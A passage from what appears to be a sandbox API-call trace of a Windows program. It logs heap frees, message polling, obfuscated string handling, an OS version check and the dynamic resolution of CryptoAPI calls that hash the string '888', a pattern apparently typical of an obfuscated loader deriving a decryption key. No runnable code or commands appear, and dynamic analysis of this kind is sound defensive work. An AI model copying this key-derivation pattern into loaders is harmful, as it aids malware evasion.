lpMsg=0x8cf0a8) returned 0 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0213.852] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.852] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.852] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.852] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.853] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0213.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0213.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0213.853] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.854] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0213.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0213.854] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.854] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.854] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.854] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0213.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7200, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0213.855] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c550) returned 1 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.857] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.857] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.857] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.857] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.857] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.857] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.857] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.857] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.857] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.858] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.858] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0213.858] CryptCreateHash (in: hProv=0xa7c550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0213.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.859] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.859] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.859] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.859] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0213.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab5c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0213.859] CryptHashData (hHash=0x9e2238, pbData=0x2a71d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.860] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.860] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.860] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 